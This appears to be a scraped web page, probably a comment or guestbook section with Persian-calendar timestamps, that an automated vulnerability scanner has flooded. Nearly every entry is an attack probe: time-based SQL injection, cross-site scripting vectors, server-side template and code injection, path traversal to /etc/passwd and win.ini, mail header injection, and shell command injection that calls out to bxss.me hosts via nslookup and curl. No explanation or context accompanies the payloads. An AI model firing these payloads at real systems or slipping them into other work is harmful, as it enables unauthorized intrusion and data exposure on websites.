  4S56PKzj' OR 774=(SELECT 774 FROM PG_SLEEP(15))--

  Http://bxss.me/t/fit.txt
  1402/04/28 18:40

  555

  http://bxss.me/t/fit.txt?.
  1402/04/28 18:40

  555

  /etc/shells
  1402/04/28 18:40

  555

  Mr.<isindex type=image src=1 onerror=A35Q(9672)>
  1402/04/28 18:40

  555

  c:/windows/win.ini
  1402/04/28 18:40

  555

  Mr.&n967318=v976709
  1402/04/28 18:40

  555

  bxss.me
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  )

  Mr.
  1402/04/28 18:40

  !(()&&!|*|*|

  Mr.
  1402/04/28 18:40

  ^(#$!@#$)(()))******

  )
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  !(()&&!|*|*|
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  ^(#$!@#$)(()))******
  1402/04/28 18:40

  555

  Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9306'>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  '.gethostbyname(lc('hitds'.'kcehomeg20a17.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(77).chr(117).chr(82).'

  Mr.
  1402/04/28 18:40

  ".gethostbyname(lc("hitay"."nnvxgtii2374b.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(76).chr(105).chr(84)."

  Mr.<body onload=A35Q(9728)>
  1402/04/28 18:40

  555

  '.gethostbyname(lc('hitnw'.'ieqadqdib3153.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(71).chr(110).chr(74).'
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  '"()

  Mr.
  1402/04/28 18:40

  555'&&sleep(27*1000)*wxdgbr&&'

  ".gethostbyname(lc("hitey"."vhdeozjqfe140.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(69).chr(117).chr(74)."
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555"&&sleep(27*1000)*kmqrpa&&"

  Mr.
  1402/04/28 18:40

  555'||sleep(27*1000)*vstzky||'

  Mr.
  1402/04/28 18:40

  555"||sleep(27*1000)*sdxukp||"

  Mr.<img src=//xss.bxss.me/t/dot.gif onload=A35Q(9120)>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  Mr.<img src=xyz OnErRor=A35Q(9139)>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  ekOpCIa3') OR 741=(SELECT 741 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:40

  HttP://bxss.me/t/xss.html?%00

  Mr.
  1402/04/28 18:40

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  Mr.
  1402/04/28 18:40

  bxss.me/t/xss.html?%00

  Mr.
  1402/04/28 18:40

  ';print(md5(31337));$a='

  Mr.
  1402/04/28 18:40

  ";print(md5(31337));$a="

  HttP://bxss.me/t/xss.html?%00
  1402/04/28 18:40

  555

  Mr.<img/src=">" onerror=alert(9503)>
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  ${@print(md5(31337))}

  bxss.me/t/xss.html?%00
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  ${@print(md5(31337))}\

  Mr.
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  '.print(md5(31337)).'

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  1402/04/28 18:40

  555

  ';print(md5(31337));$a='
  1402/04/28 18:40

  555

  ";print(md5(31337));$a="
  1402/04/28 18:40

  555

  ${@print(md5(31337))}
  1402/04/28 18:40

  555

  %4D%72%2E%3C%53%63%52%69%50%74%20%3E%41%33%35%51%289551%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/28 18:40

  555

  ${@print(md5(31337))}\
  1402/04/28 18:40

  555

  '.print(md5(31337)).'
  1402/04/28 18:40

  555

  '"()
  1402/04/28 18:40

  555

  Mr.'&&sleep(27*1000)*ugvnbl&&'
  1402/04/28 18:40

  555

  Mr."&&sleep(27*1000)*qskvpc&&"
  1402/04/28 18:40

  555

  Mr.\u003CScRiPt\A35Q(9708)\u003C/sCripT\u003E
  1402/04/28 18:40

  555

  Mr.'||sleep(27*1000)*hwojwz||'
  1402/04/28 18:40

  555

  Mr."||sleep(27*1000)*hicanr||"
  1402/04/28 18:40

  555

  Mr.&lt;ScRiPt&gt;A35Q(9133)&lt;/sCripT&gt;
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  "+"A".concat(70-3).concat(22*4).concat(99).concat(88).concat(106).concat(86)+(require"socket"
  Socket.gethostbyname("hitzf"+"nourxvjv8c7a3.bxss.me.")[3].to_s)+"

  Mr.
  1402/04/28 18:40

  '+'A'.concat(70-3).concat(22*4).concat(98).concat(89).concat(122).concat(73)+(require'socket'
  Socket.gethostbyname('hitys'+'iusejxna2fa5d.bxss.me.')[3].to_s)+'

  "+"A".concat(70-3).concat(22*4).concat(121).concat(74).concat(116).concat(71)+(require"socket" Socket.gethostbyname("hitqc"+"sczkpdtqe2ce4.bxss.me.")[3].to_s)+"
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  '+'A'.concat(70-3).concat(22*4).concat(110).concat(73).concat(115).concat(90)+(require'socket' Socket.gethostbyname('hitgy'+'mwyqeyvw9ab46.bxss.me.')[3].to_s)+'
  1402/04/28 18:40

  555

  Mr.
  1402/04/28 18:40

  555

  %F6<img zzz onmouseover=A35Q(92581) //%F6>
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  555

  Mr.<input autofocus onfocus=A35Q(9664)>
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  <a HrEF=http://xss.bxss.me></a>
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  SylUgWc4')) OR 121=(SELECT 121 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:41

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA

  Mr.
  1402/04/28 18:41

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA

  <a HrEF=jaVaScRiPT:>
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA/.

  Mr.
  1402/04/28 18:41

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA
  1402/04/28 18:41

  555

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  555

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA�
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  555

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA/.
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  xfs.bxss.me

  xfs.bxss.me
  1402/04/28 18:41

  555

  Mr.}body{zzz:Expre/**/SSion(A35Q(9845))}
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  '"

  Mr.5czRg <ScRiPt >A35Q(9873)</ScRiPt>
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  <!--

  '"
  1402/04/28 18:41

  555

  <!--
  1402/04/28 18:41

  555

  Mr.<WKDWAS>YMPOT[!+!]</WKDWAS>
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  555'"()&%<zzz><ScRiPt >kEmv(9494)</ScRiPt>

  Mr.<ifRAme sRc=9759.com></IfRamE>
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  '"()&%<zzz><ScRiPt >kEmv(9267)</ScRiPt>

  Mr.
  1402/04/28 18:41

  -1; waitfor delay '0:0:15' --

  Mr.<aFXwHIL x=9627>
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  Mr.
  1402/04/28 18:41

  5559625095

  Mr.<img sRc='http://attacker-9290/log.php?
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  bfg7375<s1﹥s2ʺs3ʹhjl7375

  Mr.<alBESgG<
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  bfgx10654%C0%BEz1%C0%BCz2a%90bcxhjl10654

  Mr.
  1402/04/28 18:41

  <%={{={@{#{${dfb}}%>

  Mr.
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  <th:t="${dfb}#foreach

  Mr.
  1402/04/28 18:41

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

  Mr.
  1402/04/28 18:41

  -1); waitfor delay '0:0:15' --

  Mr.
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  Mr.
  1402/04/28 18:41

  1'"

  Mr.
  1402/04/28 18:41

  1%C0%A7%C0%A2%2527%2522

  Mr.
  1402/04/28 18:41

  @@gZ0t9

  Mr.
  1402/04/28 18:41

  dfb{{98991*97996}}xca

  Mr.
  1402/04/28 18:41

  dfb[[${98991*97996}]]xca

  Mr.
  1402/04/28 18:41

  dfb__${98991*97996}__::.x

  Mr.
  1402/04/28 18:41

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

  Mr.
  1402/04/28 18:41

  555<ScRiPt >kEmv(9757)</ScRiPt>

  Mr.
  1402/04/28 18:41

  1 waitfor delay '0:0:15' --

  Mr.
  1402/04/28 18:41

  555<W6FOWC>BSSF2[!+!]</W6FOWC>

  Mr.
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  555<script>kEmv(9500)</script>

  Mr.
  1402/04/28 18:41

  555<ScR<ScRiPt>IpT>kEmv(9853)</sCr<ScRiPt>IpT>

  Mr.
  1402/04/28 18:41

  555<ScRiPt
  >kEmv(9677)</ScRiPt>

  Mr.
  1402/04/28 18:41

  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9023></ScRiPt>

  Mr.
  1402/04/28 18:41

  555<ScRiPt
  >kEmv(9114)</ScRiPt>

  Mr.
  1402/04/28 18:41

  NS7KVB1r'; waitfor delay '0:0:15' --

  Mr.
  1402/04/28 18:41

  555<svg  

  %A0onload=kEmv(9745);>

  Mr.
  1402/04/28 18:41

  555

  -1 OR 2+924-924-1=0+0+0+1 --
  1402/04/28 18:41

  555

  -1 OR 2+374-374-1=0+0+0+1
  1402/04/28 18:41

  555

  -1' OR 2+737-737-1=0+0+0+1 --
  1402/04/28 18:41

  555

  -1' OR 2+827-827-1=0+0+0+1 or 'R5qVDsJH'='
  1402/04/28 18:41

  555

  -1" OR 2+829-829-1=0+0+0+1 --
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  555<isindex type=image src=1 onerror=kEmv(9747)>

  Mr.
  1402/04/28 18:41

  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9257'>

  Mr.
  1402/04/28 18:41

  555<body onload=kEmv(9741)>

  Mr.
  1402/04/28 18:41

  555<img src=//xss.bxss.me/t/dot.gif onload=kEmv(9971)>

  Mr.
  1402/04/28 18:41

  555<img src=xyz OnErRor=kEmv(9596)>

  Mr.
  1402/04/28 18:41

  -5 OR 780=(SELECT 780 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:41

  555<img/src=">" onerror=alert(9867)>

  if(now()=sysdate(),sleep(15),0)
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:41

  %35%35%35%3C%53%63%52%69%50%74%20%3E%6B%45%6D%76%289164%29%3C%2F%73%43%72%69%70%54%3E

  Mr.
  1402/04/28 18:41

  555\u003CScRiPt\kEmv(9801)\u003C/sCripT\u003E

  Mr.
  1402/04/28 18:41

  555&lt;ScRiPt&gt;kEmv(9158)&lt;/sCripT&gt;

  Mr.
  1402/04/28 18:41

  %F6<img zzz onmouseover=kEmv(94441) //%F6>

  Mr.
  1402/04/28 18:41

  555<input autofocus onfocus=kEmv(9186)>

  Mr.
  1402/04/28 18:41

  -5) OR 868=(SELECT 868 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:41

  <a HrEF=http://xss.bxss.me></a>

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  1402/04/28 18:41

  555

  Mr.
  1402/04/28 18:42

  <a HrEF=jaVaScRiPT:>

  Mr.
  1402/04/28 18:42

  555}body{zzz:Expre/**/SSion(kEmv(9553))}

  Mr.
  1402/04/28 18:42

  555L5Hmu
  <ScRiPt >kEmv(9633)</ScRiPt>

  Mr.
  1402/04/28 18:42

  555<WKI0ZL>ZWVZF[!+!]</WKI0ZL>

  Mr.
  1402/04/28 18:42

  -1)) OR 523=(SELECT 523 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:42

  555<ifRAme sRc=9151.com></IfRamE>

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  1402/04/28 18:42

  555

  Mr.
  1402/04/28 18:42

  555<a40mguc x=9300>

  Mr.
  1402/04/28 18:42

  555<img sRc='http://attacker-9787/log.php?

  Mr.
  1402/04/28 18:42

  555<atECq99<

  Mr.
  1402/04/28 18:42

  kDOjothf' OR 342=(SELECT 342 FROM PG_SLEEP(15))--

  Mr.'"()&%<zzz><ScRiPt >kEmv(9900)</ScRiPt>
  1402/04/28 18:42

  555

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  1402/04/28 18:42

  555

  '"()&%<zzz><ScRiPt >kEmv(9112)</ScRiPt>
  1402/04/28 18:42

  555

  Mr.9033870
  1402/04/28 18:42

  555

  bfg1704<s1﹥s2ʺs3ʹhjl1704
  1402/04/28 18:42

  555

  Mr.
  1402/04/28 18:42

  SHpDvLg2') OR 291=(SELECT 291 FROM PG_SLEEP(15))--

  1 waitfor delay '0:0:15' --
  1402/04/28 18:42

  555

  bfgx5410%C0%BEz1%C0%BCz2a%90bcxhjl5410
  1402/04/28 18:42

  555

  <%={{={@{#{${dfb}}%>
  1402/04/28 18:42

  555

  <th:t="${dfb}#foreach
  1402/04/28 18:42

  555

  Mr.
  1402/04/28 18:42

  rD4MXVVd')) OR 265=(SELECT 265 FROM PG_SLEEP(15))--

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/28 18:42

  555

  gBnDhdaK'; waitfor delay '0:0:15' --
  1402/04/28 18:42

  555

  dfb{{98991*97996}}xca
  1402/04/28 18:42

  555

  dfb[[${98991*97996}]]xca
  1402/04/28 18:42

  555

  Mr.
  1402/04/28 18:42

  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  dfb__${98991*97996}__::.x
  1402/04/28 18:42

  555

  Air0ZILw' OR 927=(SELECT 927 FROM PG_SLEEP(15))--
  1402/04/28 18:42

  555

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/28 18:42

  555

  Mr.<ScRiPt >kEmv(9967)</ScRiPt>
  1402/04/28 18:42

  555

  Mr.
  1402/04/28 18:42

  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  Mr.
  1402/04/28 18:42

  1'"

  Mr.
  1402/04/28 18:42

  1%C0%A7%C0%A2%2527%2522

  Mr.
  1402/04/28 18:42

  @@GmgAb

  Mr.<W6NJGN>V0PF1[!+!]</W6NJGN>
  1402/04/28 18:42

  555

  bzMbAIfM') OR 116=(SELECT 116 FROM PG_SLEEP(15))--
  1402/04/28 18:42

  555

  Mr.<script>kEmv(9520)</script>
  1402/04/28 18:42

  555

  Mr.<ScR<ScRiPt>IpT>kEmv(9237)</sCr<ScRiPt>IpT>
  1402/04/28 18:42

  555

  Mr.
  1402/04/28 18:42

  555

  rRZ434nc')) OR 65=(SELECT 65 FROM PG_SLEEP(15))--
  1402/04/28 18:42

  555

  Mr.<ScRiPt >kEmv(9164)</ScRiPt>
  1402/04/28 18:42

  555

  Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9975></ScRiPt>
  1402/04/28 18:42

  555

  Mr.<�ScRiPt >kEmv(9725)</ScRiPt>
  1402/04/28 18:42

  555

  Mr.<svg %A0�onload=kEmv(9914);>
  1402/04/28 18:42

  555

  Mr.
  1402/04/28 18:42

  555

  -1 OR 2+925-925-1=0+0+0+1 --
  1402/04/28 18:42

  555

  -1 OR 2+652-652-1=0+0+0+1
  1402/04/28 18:42

  555

  Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  1402/04/28 18:42

  555

  -1' OR 2+641-641-1=0+0+0+1 --
  1402/04/28 18:42

  555

  1'"
  1402/04/28 18:42

  555

  Mr.<isindex type=image src=1 onerror=kEmv(9262)>
  1402/04/28 18:42

  555

  -1' OR 2+639-639-1=0+0+0+1 or '1t0my2DI'='
  1402/04/28 18:42

  555

  1�%C0%A7%C0%A2%2527%2522
  1402/04/28 18:42

  555

  -1" OR 2+862-862-1=0+0+0+1 --
  1402/04/28 18:42

  555

  @@npZc7
  1402/04/28 18:42

  555

  Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9385'>
  1402/04/28 18:43

  555

  Mr.<body onload=kEmv(9362)>
  1402/04/28 18:43

  555

  Mr.<img src=//xss.bxss.me/t/dot.gif onload=kEmv(9056)>
  1402/04/28 18:43

  555

  if(now()=sysdate(),sleep(15),0)
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  Mr.<img src=xyz OnErRor=kEmv(9336)>
  1402/04/28 18:43

  555

  Mr.<img/src=">" onerror=alert(9171)>
  1402/04/28 18:43

  555

  %4D%72%2E%3C%53%63%52%69%50%74%20%3E%6B%45%6D%76%289538%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  Mr.\u003CScRiPt\kEmv(9771)\u003C/sCripT\u003E
  1402/04/28 18:43

  555

  Mr.&lt;ScRiPt&gt;kEmv(9717)&lt;/sCripT&gt;
  1402/04/28 18:43

  555

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  %F6<img zzz onmouseover=kEmv(95521) //%F6>
  1402/04/28 18:43

  555

  Mr.<input autofocus onfocus=kEmv(9966)>
  1402/04/28 18:43

  555

  <a HrEF=http://xss.bxss.me></a>
  1402/04/28 18:43

  555

  <a HrEF=jaVaScRiPT:>
  1402/04/28 18:43

  555

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  Mr.}body{zzz:Expre/**/SSion(kEmv(9722))}
  1402/04/28 18:43

  555

  Mr.TiiFN <ScRiPt >kEmv(9836)</ScRiPt>
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  response.write(9121286*9537229)

  Mr.
  1402/04/28 18:43

  '+response.write(9121286*9537229)+'

  Mr.
  1402/04/28 18:43

  "+response.write(9121286*9537229)+"

  response.write(9857717*9221439)
  1402/04/28 18:43

  555

  '+response.write(9857717*9221439)+'
  1402/04/28 18:43

  555

  "+response.write(9857717*9221439)+"
  1402/04/28 18:43

  555

  Mr.<WSLYQS>9ISW9[!+!]</WSLYQS>
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  echo pmcful$()\ xmxglm\nz^xyu||a #' &echo pmcful$()\ xmxglm\nz^xyu||a #|" &echo pmcful$()\ xmxglm\nz^xyu||a #

  Mr.
  1402/04/28 18:43

  &echo uqtebv$()\ aakdil\nz^xyu||a #' &echo uqtebv$()\ aakdil\nz^xyu||a #|" &echo uqtebv$()\ aakdil\nz^xyu||a #

  Mr.
  1402/04/28 18:43

  |echo rbkopg$()\ cwopjz\nz^xyu||a #' |echo rbkopg$()\ cwopjz\nz^xyu||a #|" |echo rbkopg$()\ cwopjz\nz^xyu||a #

  Mr.
  1402/04/28 18:43

  (nslookup -q=cname hithwgyeqlwivf970c.bxss.me||curl hithwgyeqlwivf970c.bxss.me))

  Mr.
  1402/04/28 18:43

  $(nslookup -q=cname hitumdgvdlsfee3010.bxss.me||curl hitumdgvdlsfee3010.bxss.me)

  Mr.
  1402/04/28 18:43

  &nslookup -q=cname hitadvpjsebbpbe490.bxss.me&'\"`0&nslookup -q=cname hitadvpjsebbpbe490.bxss.me&`'

  Mr.
  1402/04/28 18:43

  &(nslookup -q=cname hitulgzsbdkntd6b23.bxss.me||curl hitulgzsbdkntd6b23.bxss.me)&'\"`0&(nslookup -q=cname hitulgzsbdkntd6b23.bxss.me||curl hitulgzsbdkntd6b23.bxss.me)&`'

  Mr.
  1402/04/28 18:43

  |(nslookup -q=cname hitgoeergfczgf3eb6.bxss.me||curl hitgoeergfczgf3eb6.bxss.me)

  Mr.
  1402/04/28 18:43

  `(nslookup -q=cname hitqbcplsjiov8b3d6.bxss.me||curl hitqbcplsjiov8b3d6.bxss.me)`

  Mr.<ifRAme sRc=9793.com></IfRamE>
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  ;(nslookup -q=cname hitgwtuuvgjkx57fe9.bxss.me||curl hitgwtuuvgjkx57fe9.bxss.me)|(nslookup -q=cname hitgwtuuvgjkx57fe9.bxss.me||curl hitgwtuuvgjkx57fe9.bxss.me)&(nslookup -q=cname hitgwtuuvgjkx57fe9.bxss.me||curl hitgwtuuvgjkx57fe9.bxss.me)

  echo spxkkz$()\ vigovx\nz^xyu||a #' &echo spxkkz$()\ vigovx\nz^xyu||a #|" &echo spxkkz$()\ vigovx\nz^xyu||a #
  1402/04/28 18:43

  555

  &echo rurpdo$()\ bqnkui\nz^xyu||a #' &echo rurpdo$()\ bqnkui\nz^xyu||a #|" &echo rurpdo$()\ bqnkui\nz^xyu||a #
  1402/04/28 18:43

  555

  |echo zxzazx$()\ awkluq\nz^xyu||a #' |echo zxzazx$()\ awkluq\nz^xyu||a #|" |echo zxzazx$()\ awkluq\nz^xyu||a #
  1402/04/28 18:43

  555

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  1402/04/28 18:43

  555

  (nslookup -q=cname hitxgqvqrgjot32f39.bxss.me||curl hitxgqvqrgjot32f39.bxss.me))
  1402/04/28 18:43

  555

  $(nslookup -q=cname hitvnvejlpmam6fd44.bxss.me||curl hitvnvejlpmam6fd44.bxss.me)
  1402/04/28 18:43

  555

  &nslookup -q=cname hitfiuhsikyyn1113f.bxss.me&'\"`0&nslookup -q=cname hitfiuhsikyyn1113f.bxss.me&`'
  1402/04/28 18:43

  555

  &(nslookup -q=cname hitmrpqarufcg1445e.bxss.me||curl hitmrpqarufcg1445e.bxss.me)&'\"`0&(nslookup -q=cname hitmrpqarufcg1445e.bxss.me||curl hitmrpqarufcg1445e.bxss.me)&`'
  1402/04/28 18:43

  555

  Mr.<aTQJADk x=9447>
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  |(nslookup -q=cname hithgyjspmytjdd64b.bxss.me||curl hithgyjspmytjdd64b.bxss.me)
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  -1 OR 2+724-724-1=0+0+0+1 --

  `(nslookup -q=cname hitaejurgaptke7a5e.bxss.me||curl hitaejurgaptke7a5e.bxss.me)`
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  -1 OR 2+473-473-1=0+0+0+1

  Mr.
  1402/04/28 18:43

  -1' OR 2+459-459-1=0+0+0+1 --

  Mr.
  1402/04/28 18:43

  -1' OR 2+701-701-1=0+0+0+1 or 'IrTPWXCG'='

  Mr.
  1402/04/28 18:43

  -1" OR 2+528-528-1=0+0+0+1 --

  Mr.<img sRc='http://attacker-9760/log.php?
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  4F00tSrV

  eM8pacZO
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  ../../../../../../../../../../../../../../etc/passwd

  Mr.<aWydOoH<
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  ../../../../../../../../../../../../../../windows/win.ini

  Mr.
  1402/04/28 18:43

  555
  bcc:074625.447-176163.447.64d00.19557.2@bxss.me

  Mr.
  1402/04/28 18:43

  file:///etc/passwd

  Mr.
  1402/04/28 18:43

  to@example.com>
  bcc:074625.447-176164.447.64d00.19557.2@bxss.me

  Mr. bcc:074625.447-176165.447.64d00.19557.2@bxss.me
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  to@example.com> bcc:074625.447-176166.447.64d00.19557.2@bxss.me
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  ../555

  ../../../../../../../../../../../../../../etc/passwd
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555<esi:include src="http://bxss.me/rpb.png"/>

  1 waitfor delay '0:0:15' --
  1402/04/28 18:43

  555

  ../../../../../../../../../../../../../../windows/win.ini
  1402/04/28 18:43

  555

  Mr.<esi:include src="http://bxss.me/rpb.png"/>
  1402/04/28 18:43

  555

  file:///etc/passwd
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  ${10000478+10000019}

  ../Mr.
  1402/04/28 18:43

  555

  ${9999893+9999522}
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  if(now()=sysdate(),sleep(15),0)

  Mr.
  1402/04/28 18:43

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

  Mr.
  1402/04/28 18:43

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

  Mr.
  1402/04/28 18:43

  Http://bxss.me/t/fit.txt

  Mr.
  1402/04/28 18:43

  http://bxss.me/t/fit.txt?.jpg

  Mr.
  1402/04/28 18:43

  /etc/shells

  Mr.
  1402/04/28 18:43

  c:/windows/win.ini

  Mr.
  1402/04/28 18:43

  bxss.me

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.
  1402/04/28 18:43

  555

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.
  1402/04/28 18:43

  555

  Http://bxss.me/t/fit.txt
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555&n994756=v949413

  http://bxss.me/t/fit.txt?.
  1402/04/28 18:43

  555

  /etc/shells
  1402/04/28 18:43

  555

  c:/windows/win.ini
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  bxss.me
  1402/04/28 18:43

  555

  Mr.&n909482=v960656
  1402/04/28 18:43

  555

  1mdIeBM0'; waitfor delay '0:0:15' --
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  )

  Mr.
  1402/04/28 18:43

  !(()&&!|*|*|

  Mr.
  1402/04/28 18:43

  ^(#$!@#$)(()))******

  )
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  !(()&&!|*|*|
  1402/04/28 18:43

  555

  ^(#$!@#$)(()))******
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  9Er6auBO' OR 383=(SELECT 383 FROM PG_SLEEP(15))--
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  555

  Mr.
  1402/04/28 18:43

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  Mr.
  1402/04/28 18:43

  '"()

  Mr.
  1402/04/28 18:43

  555'&&sleep(27*1000)*wczzrp&&'

  Mr.
  1402/04/28 18:43

  555"&&sleep(27*1000)*zojslo&&"

  Mr.
  1402/04/28 18:43

  '.gethostbyname(lc('hitdu'.'mqxtwugwe2865.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(80).chr(116).chr(70).'

  Mr.
  1402/04/28 18:44

  555'||sleep(27*1000)*ixiqie||'

  nE8Jjx8k') OR 761=(SELECT 761 FROM PG_SLEEP(15))--
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  ".gethostbyname(lc("hittp"."wublfcgm87343.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(75).chr(121).chr(84)."

  Mr.
  1402/04/28 18:44

  555"||sleep(27*1000)*wpdiww||"

  '.gethostbyname(lc('hitch'.'jcpkauku25b58.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(78).chr(103).chr(68).'
